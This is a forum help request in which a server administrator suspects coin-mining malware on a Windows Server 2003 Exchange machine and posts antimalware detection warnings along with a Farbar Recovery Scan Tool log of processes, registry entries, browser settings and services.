Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

LSMOSE.EXE popups - bitminer malware?


  • This topic is locked This topic is locked
18 replies to this topic

#1 adalta

adalta

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 11 September 2017 - 01:46 PM

Hello All,

 

I have a Windows 2003/Exchange 2007 server that may be infected with bit miner malware. I noticed a few days ago LSMOSE.EXE popups when RDP'ing into my Exchange server. Initially this server had only a mail system antivirus. I just recently installed file system antivirus.

 

Below are Event Log AntiMalware Warnings:

 

 

example app log error:

Faulting application lsmose.exe, version 0.0.0.0, faulting module lsmose.exe, version 0.0.0.0, fault address 0x00000000000117de.

 

I see various MS Antimalware detection Warnings:

Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: Behavior:Win32/Powemet.B!attk
  ID: 2147722898
  Severity: Severe
  Category: Suspicious Behavior
  Path: behavior:_pid:4540:94227975697806;process:_pid:4540
  Detection Origin: Unknown
  Detection Type: Concrete
  Detection Source: System
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\WINDOWS\system32\regsvr32.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp
 
 For more information please see the following:
  Name: Trojan:BAT/CoinMiner.A
  ID: 2147685541
  Severity: Severe
  Category: Trojan
  Path: file:_C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\PRN4NH4C\close2[1].bat
 
  Name: Trojan:BAT/CoinMiner.A
  ID: 2147685541
  Severity: Severe
  Category: Trojan
  Path: file:_C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\PRN4NH4C\close2[1].bat
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: CENTRECITY\veritas
  Process Name: C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
Thank you

 

 

##############FRST LOG below###############

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 11-09-2017
Ran by administrator (administrator) on MYSERVER-EXCH-01 (11-09-2017 11:19:34)
Running from \\MYSERVER-arch-01\Install\Apps\antivirus
Loaded Profiles: administrator (Available Profiles: veritas & desktop & beltran & administrator & Administrator)
Platform: Microsoft Windows Server 2003 R2 Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 6 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> MsMpEng.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> iscsiexe.exe
Failed to access process -> spoolsv.exe
Failed to access process -> msdtc.exe
Failed to access process -> bedbg.exe
Failed to access process -> dsm_sa_eventmgr32.exe
Failed to access process -> dsm_sa_datamgr32.exe
Failed to access process -> svchost.exe
Failed to access process -> HealthService.exe
Failed to access process -> inetinfo.exe
Failed to access process -> mr2kserv.exe
Failed to access process -> MSExchangeADTopologyService.exe
Failed to access process -> msftesql.exe
Failed to access process -> sqlservr.exe
Failed to access process -> dsm_om_shrsvc32.exe
Failed to access process -> svchost.exe
Failed to access process -> svcGenericHost.exe
Failed to access process -> SMEX_SystemWatcher.exe
Failed to access process -> dsm_om_connsvc32.exe
Failed to access process -> snmp.exe
Failed to access process -> sqlbrowser.exe
Failed to access process -> sqlwriter.exe
Failed to access process -> snmp.exe
Failed to access process -> beremote.exe
Failed to access process -> store.exe
Failed to access process -> mad.exe
Failed to access process -> svchost.exe
Failed to access process -> svcGenericHost.exe
Failed to access process -> SMEX_Master.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> MonitoringHost.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> MonitoringHost.exe
Failed to access process -> Microsoft.Exchange.AntispamUpdateSvc.exe
Failed to access process -> Microsoft.Exchange.EdgeSyncSvc.exe
Failed to access process -> MsExchangeFDS.exe
Failed to access process -> MSExchangeMailboxAssistants.exe
Failed to access process -> MSExchangeMailSubmission.exe
Failed to access process -> Microsoft.Exchange.Cluster.ReplayService.exe
Failed to access process -> Microsoft.Exchange.Search.ExSearch.exe
Failed to access process -> Microsoft.Exchange.ServiceHost.exe
Failed to access process -> MSExchangeTransport.exe
Failed to access process -> MSExchangeTransportLogSearch.exe
Failed to access process -> EdgeTransport.exe
Failed to access process -> Microsoft.Exchange.ContentFilter.Wrapper.exe
Failed to access process -> SMEX_CmAgentHost.exe
Failed to access process -> svcGenericHost.exe
Failed to access process -> SMEX_RemoteConfig.exe
Failed to access process -> svchost.exe
Failed to access process -> alg.exe
Failed to access process -> w3wp.exe
Failed to access process -> w3wp.exe
Failed to access process -> svchost.exe
Failed to access process -> w3wp.exe
Failed to access process -> w3wp.exe
Failed to access process -> w3wp.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> rdpclip.exe
Failed to access process -> explorer.exe
Failed to access process -> msseces.exe
Failed to access process -> jusched.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> msftefd.exe
Failed to access process -> rundll32.exe
Failed to access process -> logon.scr
Failed to access process -> taskmgr.exe
Failed to access process -> msert.exe
Failed to access process -> mmc.exe
Failed to access process -> FRST64.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-09-14] (Microsoft Corporation)
HKLM\...\Run: [UserFaultCheck] => %systemroot%\system32\dumprep 0 -u
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596504 2016-04-01] (Oracle Corporation)
HKLM-x32\...\Winlogon: [Userinit] userinit
Winlogon\Notify\AtiExtEvent: Ati2evxx.dll [X]
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll (Microsoft Corporation)
Winlogon\Notify\termsrv: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll [2015-06-26] (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\EFS: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
HKLM\...\Policies\Explorer: [ShowSuperHidden] 1
HKLM\...\Command Processor:  <==== ATTENTION
HKLM-x32\...\Command Processor:  <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-1085031214-630328440-682003330-500\...\MountPoints2: {7331afc2-ab46-11dc-980b-0015174b656b} - D:\wd_windows_tools\setup.exe
HKU\S-1-5-18\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
IFEO\Your Image File Name Here without a path: [Debugger] ntsd -d
Lsa: [Notification Packages] RASSFM KDCSVC WDIGEST scecli
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
SSODL: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\system32\stobject.dll (Microsoft Corporation)
SSODL-x32: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\SysWOW64\stobject.dll (Microsoft Corporation)
ShellExecuteHooks: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
ShellExecuteHooks-x32: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
Startup: C:\Documents and Settings\administrator.CENTRECITY\Start Menu\Programs\Startup\Exchange Management Console.lnk [2007-12-15]
ShortcutTarget: Exchange Management Console.lnk -> C:\Program Files\Microsoft\Exchange Server\Bin\Exchange Management Console.msc ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{9c3c4082-1557-4e12-ac3e-430a07c84241} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 03 C:\Windows\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\..\Interfaces\{0686E85A-4375-4102-9146-D6010CBE6CB1}: [NameServer] 192.168.100.10
Tcpip\..\Interfaces\{362095FE-C004-4918-87FB-4D36CCD5B462}: [NameServer] 192.168.100.10
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKU\S-1-5-21-1085031214-630328440-682003330-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://MYSERVER-exch-01:1311/
HKU\S-1-5-21-1085031214-630328440-682003330-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
URLSearchHook: HKU\S-1-5-21-1085031214-630328440-682003330-500 - Microsoft Url Search Hook - {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\WINDOWS\system32\shdocvw.dll (Microsoft Corporation)
URLSearchHook: HKU\S-1-5-21-1085031214-630328440-682003330-500 - Microsoft Url Search Hook - {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\WINDOWS\SysWOW64\shdocvw.dll (Microsoft Corporation)
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-04-26] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-04-26] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1085031214-630328440-682003330-500 -> &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll [2015-06-16] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1085031214-630328440-682003330-500 -> &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
DPF: HKLM-x32 {215B8138-A3CF-44C5-803F-8226143CFC0A} hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab
DPF: HKLM-x32 {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1197340237272
DPF: HKLM-x32 {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} hxxp://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1204942977104
Filter: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Filter-x32: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\syswow64\SHELL32.dll [2015-02-18] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Documents and Settings\administrator.CENTRECITY\Application Data\Mozilla\Firefox\Profiles\47wrj1p2.default [2017-09-08]
FF DefaultSearchEngine.US: C:\Documents and Settings\administrator.CENTRECITY\Application Data\Mozilla\Firefox\Profiles\47wrj1p2.default -> Google
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-04] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_19_0_0_185.dll [2015-09-24] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll [2015-09-24] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-04-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-04-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AdtAgent; C:\WINDOWS\system32\AdtAgent.exe [397696 2009-11-02] (Microsoft Corporation)
R2 AeLookupSvc; C:\WINDOWS\SysWOW64\aelupsvc.dll [26624 2007-02-18] (Microsoft Corporation)
S4 Alerter; C:\WINDOWS\system32\alrsvc.dll [29696 2007-02-18] (Microsoft Corporation)
R3 ALG; C:\WINDOWS\System32\alg.exe [75776 2007-02-18] (Microsoft Corporation)
R3 ALG; C:\WINDOWS\SysWOW64\alg.exe [45056 2007-02-18] (Microsoft Corporation)
R2 AudioSrv; C:\WINDOWS\SysWOW64\audiosrv.dll [41472 2007-02-18] (Microsoft Corporation)
R2 BackupExecAgentAccelerator; C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe [1858384 2014-03-25] (Symantec Corporation)
R2 bedbg; C:\Program Files\Symantec\Backup Exec\RAWS\bedbg.exe [360272 2014-01-03] (Symantec Corporation)
R2 Browser; C:\WINDOWS\SysWOW64\browser.dll [78336 2012-09-12] (Microsoft Corporation)
S4 CiSvc; C:\WINDOWS\system32\cisvc.exe [8704 2007-02-18] (Microsoft Corporation)
S4 CiSvc; C:\WINDOWS\SysWOW64\cisvc.exe [6656 2007-02-18] (Microsoft Corporation)
S4 ClipSrv; C:\WINDOWS\system32\clipsrv.exe [49664 2007-02-18] (Microsoft Corporation)
S4 ClipSrv; C:\WINDOWS\SysWOW64\clipsrv.exe [32256 2007-02-18] (Microsoft Corporation)
R2 dcevt32; C:\Program Files (x86)\Dell\SysMgt\dataeng\bin\dsm_sa_eventmgr32.exe [153560 2009-11-05] (Dell Inc.)
R2 dcstor32; C:\Program Files (x86)\Dell\SysMgt\dataeng\bin\dsm_sa_datamgr32.exe [202712 2009-11-05] (Dell Inc.)
S3 Dfs; C:\WINDOWS\system32\Dfssvc.exe [321024 2007-02-18] (Microsoft Corporation)
S3 Dfs; C:\WINDOWS\SysWOW64\Dfssvc.exe [164864 2007-02-18] (Microsoft Corporation)
S3 dmadmin; C:\WINDOWS\System32\dmadmin.exe [399872 2007-02-18] (Microsoft Corporation)
R2 dmserver; C:\WINDOWS\System32\dmserver.dll [37376 2007-02-18] (Microsoft Corporation)
R2 Dnscache; C:\WINDOWS\SysWOW64\dnsrslvr.dll [45568 2011-03-03] (Microsoft Corporation)
R2 ERSvc; C:\WINDOWS\System32\ersvc.dll [31744 2007-02-18] (Microsoft Corporation)
S4 EUQ_Monitor; C:\Program Files\Trend Micro\Smex\EUQ\EUQMonitor.exe [33840 2013-02-11] (Trend Micro Inc.)
R2 Eventlog; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 HealthService; C:\Program Files\System Center Operations Manager 2007\HealthService.exe [31792 2008-02-16] (Microsoft Corporation)
R2 helpsvc; C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll [77312 2007-02-18] (Microsoft Corporation)
R3 HTTPFilter; C:\WINDOWS\System32\w3ssl.dll [21504 2007-02-18] (Microsoft Corporation)
R3 HTTPFilter; C:\WINDOWS\SysWOW64\w3ssl.dll [15360 2007-02-18] (Microsoft Corporation)
S3 IASJet; C:\WINDOWS\SysWOW64\iasrecst.dll [162816 2007-02-18] (Microsoft Corporation)
R2 IISADMIN; C:\WINDOWS\system32\inetsrv\inetinfo.exe [17920 2007-02-18] (Microsoft Corporation)
S4 ImapiService; C:\WINDOWS\system32\imapi.exe [265728 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\System32\ismserv.exe [60416 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\SysWOW64\ismserv.exe [40448 2007-02-18] (Microsoft Corporation)
S4 kdc; C:\WINDOWS\System32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\System32\llssrv.exe [191488 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\SysWOW64\llssrv.exe [94720 2007-02-18] (Microsoft Corporation)
S3 LiveUpdate; C:\Program Files (x86)\Symantec\LiveUpdate\LuComServer_3_3.EXE [3093872 2008-08-11] (Symantec Corporation)
R2 LmHosts; C:\WINDOWS\SysWOW64\lmhsvc.dll [19968 2007-02-18] (Microsoft Corporation)
S4 Messenger; C:\WINDOWS\System32\msgsvc.dll [57344 2007-02-18] (Microsoft Corporation)
S4 mnmsrvc; C:\WINDOWS\SysWOW64\mnmsrvc.exe [32768 2007-02-18] (Microsoft Corporation)
R2 mr2kserv; C:\Program Files (x86)\Dell\SysMgt\sm\mr2kserv.exe [69632 2009-11-03] (LSI Logic Corporation) [File not signed]
R2 MSDTC; C:\WINDOWS\system32\msdtc.exe [6656 2008-07-24] (Microsoft Corporation)
R2 MSExchangeADTopology; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeADTopologyService.exe [111416 2010-12-03] (Microsoft Corporation)
R2 MSExchangeAntispamUpdate; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.AntispamUpdateSvc.exe [35664 2010-12-03] (Microsoft Corporation)
R2 MSExchangeEdgeSync; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.EdgeSyncSvc.exe [80704 2010-12-03] (Microsoft Corporation)
R2 MSExchangeFDS; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeFDS.exe [84768 2010-12-03] (Microsoft Corporation)
S3 MSExchangeImap4; C:\Program Files\Microsoft\Exchange Server\ClientAccess\PopImap\Microsoft.Exchange.Imap4Service.exe [18752 2010-12-03] (Microsoft Corporation)
R2 MSExchangeIS; C:\Program Files\Microsoft\Exchange Server\bin\store.exe [9517320 2010-12-03] (Microsoft Corporation)
R2 MSExchangeMailboxAssistants; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeMailboxAssistants.exe [256824 2010-12-03] (Microsoft Corporation)
R2 MSExchangeMailSubmission; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeMailSubmission.exe [56112 2010-12-03] (Microsoft Corporation)
S3 MSExchangeMonitoring; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.Monitoring.exe [52024 2010-12-03] (Microsoft Corporation)
S3 MSExchangePop3; C:\Program Files\Microsoft\Exchange Server\ClientAccess\PopImap\Microsoft.Exchange.Pop3Service.exe [18752 2010-12-03] (Microsoft Corporation)
R2 MSExchangeRepl; C:\Program Files\Microsoft\Exchange Server\bin\Microsoft.Exchange.Cluster.ReplayService.exe [60240 2010-12-03] (Microsoft Corporation)
R2 MSExchangeSA; C:\Program Files\Microsoft\Exchange Server\bin\mad.exe [2760968 2010-12-03] (Microsoft Corporation)
R2 MSExchangeSearch; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.Search.ExSearch.exe [228168 2010-12-03] (Microsoft Corporation)
R2 MSExchangeServiceHost; C:\Program Files\Microsoft\Exchange Server\bin\Microsoft.Exchange.ServiceHost.exe [31552 2010-12-03] (Microsoft Corporation)
R2 MSExchangeTransport; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeTransport.exe [60200 2010-12-03] (Microsoft Corporation)
R2 MSExchangeTransportLogSearch; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeTransportLogSearch.exe [68408 2010-12-03] (Microsoft Corporation)
R3 msftesql-Exchange; C:\Program Files\Microsoft\Exchange Server\bin\msftesql.exe [156000 2009-04-23] (Microsoft Corporation)
R2 MSiSCSI; C:\WINDOWS\System32\iscsiexe.exe [177720 2008-11-13] (Microsoft Corporation)
S3 MSIServer; C:\WINDOWS\System32\msiexec.exe [125440 2015-06-26] (Microsoft Corporation)
S3 MSIServer; C:\WINDOWS\SysWOW64\msiexec.exe [96256 2015-06-26] (Microsoft Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-09-14] (Microsoft Corporation)
R2 MSSQL$SCANMAIL; C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
R2 Netlogon; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R3 Netman; C:\WINDOWS\SysWOW64\netman.dll [263680 2007-02-18] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\system32\ntfrs.exe [1158144 2007-02-18] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\SysWOW64\ntfrs.exe [792064 2007-02-18] (Microsoft Corporation)
R3 NtLmSsp; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S3 NtmsSvc; C:\WINDOWS\system32\ntmssvc.dll [794112 2007-02-18] (Microsoft Corporation)
R2 omsad; C:\Program Files (x86)\Dell\SysMgt\oma\bin\dsm_om_shrsvc32.exe [22952 2009-10-22] (Dell Inc.)
S3 PDVFSService; C:\Program Files\Symantec\Backup Exec\RAWS\PDVFSService.exe [301680 2013-06-20] ()
R2 PlugPlay; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 PolicyAgent; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R2 ProtectedStorage; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S3 RasAuto; C:\WINDOWS\SysWOW64\rasauto.dll [91648 2007-02-18] (Microsoft Corporation)
R3 RasMan; C:\WINDOWS\SysWOW64\rasmans.dll [181760 2007-02-18] (Microsoft Corporation)
S3 RDSessMgr; C:\WINDOWS\system32\sessmgr.exe [212480 2007-02-18] (Microsoft Corporation)
R2 RemoteRegistry; C:\WINDOWS\SysWOW64\regsvc.dll [69120 2007-02-18] (Microsoft Corporation)
